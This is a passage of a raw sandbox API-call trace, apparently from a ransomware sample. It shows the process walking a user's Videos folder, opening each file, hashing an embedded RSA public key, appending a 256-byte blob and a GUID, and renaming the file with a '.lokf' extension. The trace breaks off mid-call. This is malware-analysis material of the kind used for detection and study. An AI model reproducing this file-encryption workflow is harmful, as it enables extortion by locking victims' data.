ftLastWriteTime.dwLowDateTime=0x27e7be0, ftLastWriteTime.dwHighDateTime=0x1d4cbe5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.111] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66d6f180, ftCreationTime.dwHighDateTime=0x1d4cbc7, ftLastAccessTime.dwLowDateTime=0xddf858e0, ftLastAccessTime.dwHighDateTime=0x1d4c6f3, ftLastWriteTime.dwLowDateTime=0xddf858e0, ftLastWriteTime.dwHighDateTime=0x1d4c6f3, nFileSizeHigh=0x0, nFileSizeLow=0x7110, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2-PB.swf", cAlternateFileName="")) returned 1 [0060.111] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\2-PB.swf") returned=".swf" [0060.111] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\2-PB.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\2-pb.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.111] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=28944) returned 1 [0060.111] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.114] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x70ea, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.114] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.114] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x7110, lpOverlapped=0x0) returned 1 [0060.115] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.115] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.115] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.115] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8610) returned 1 [0060.115] CryptCreateHash (in: hProv=0x6b8610, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.115] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.115] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.116] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.116] GetLastError () returned 0x0 [0060.116] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.116] CryptReleaseContext (hProv=0x6b8610, dwFlags=0x0) returned 1 [0060.116] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.116] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.116] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.116] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.116] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.116] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.116] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x7110, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.116] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f908*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.116] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0060.117] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.117] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.117] CloseHandle (hObject=0x5cc) returned 1 [0060.118] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269a90 [0060.118] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x870) returned 0x3268798 [0060.118] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269a90 | out: hHeap=0x660000) returned 1 [0060.118] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\2-PB.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\2-pb.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\2-PB.swf.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\2-pb.swf.lokf")) returned 1 [0060.118] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.118] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.118] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.119] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adbb0 | out: hHeap=0x660000) returned 1 [0060.119] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0d75ca0, ftCreationTime.dwHighDateTime=0x1d4c570, ftLastAccessTime.dwLowDateTime=0x2e856740, ftLastAccessTime.dwHighDateTime=0x1d4d2e7, ftLastWriteTime.dwLowDateTime=0x2e856740, ftLastWriteTime.dwHighDateTime=0x1d4d2e7, nFileSizeHigh=0x0, nFileSizeLow=0x4220, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3gmurZa_KyIq0.mkv", cAlternateFileName="3GMURZ~1.MKV")) returned 1 [0060.119] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.119] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8e) returned 0x32adbb0 [0060.119] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.119] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\3gmurZa_KyIq0.mkv") returned=".mkv" [0060.119] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\3gmurZa_KyIq0.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\3gmurza_kyiq0.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.119] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=16928) returned 1 [0060.119] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.122] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x41fa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.122] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.123] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.123] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.123] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x4220, lpOverlapped=0x0) returned 1 [0060.123] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.123] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.123] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.123] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8610) returned 1 [0060.124] CryptCreateHash (in: hProv=0x6b8610, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.124] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.124] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.124] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.124] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.124] GetLastError () returned 0x0 [0060.124] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.124] CryptReleaseContext (hProv=0x6b8610, dwFlags=0x0) returned 1 [0060.124] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.124] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.124] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.124] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.124] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.124] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.124] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.124] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4220) returned 0x9c8bae8 [0060.124] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0060.124] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0060.124] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0060.124] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.124] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0060.124] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0060.124] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c88c20 [0060.124] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85b60 [0060.124] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c88c68 [0060.124] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85b78 [0060.124] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85ba8 [0060.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0060.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85bc0 [0060.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0060.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0060.125] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0060.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85ba8 | out: hHeap=0x660000) returned 1 [0060.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85bc0 | out: hHeap=0x660000) returned 1 [0060.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0060.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0060.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0060.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f60 [0060.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85bc0 [0060.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0060.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c85ba8 [0060.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0060.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0060.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0060.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0060.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0060.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0060.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0060.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0060.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85bc0 | out: hHeap=0x660000) returned 1 [0060.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85ba8 | out: hHeap=0x660000) returned 1 [0060.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0060.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0060.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0060.125] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.125] GetCurrentThreadId () returned 0x9e0 [0060.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0060.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c89cb0 [0060.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0060.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8610 [0060.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0060.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0060.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0060.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0060.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.126] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.126] GetCurrentThreadId () returned 0x9e0 [0060.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.126] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0060.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.126] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.126] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.126] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0060.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0060.126] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0060.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0060.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0060.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0060.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0060.126] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0060.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0060.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0060.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0060.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0060.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0060.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85ba8 [0060.126] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0060.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0060.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0060.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0060.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0060.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85bc0 [0060.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0060.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0060.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0060.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85b90 [0060.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0060.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85770 [0060.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f30 [0060.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0060.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0060.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857e8 [0060.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0060.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85bd8 [0060.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.127] RtlAllocateHeap (HeapHandle=0x660000, 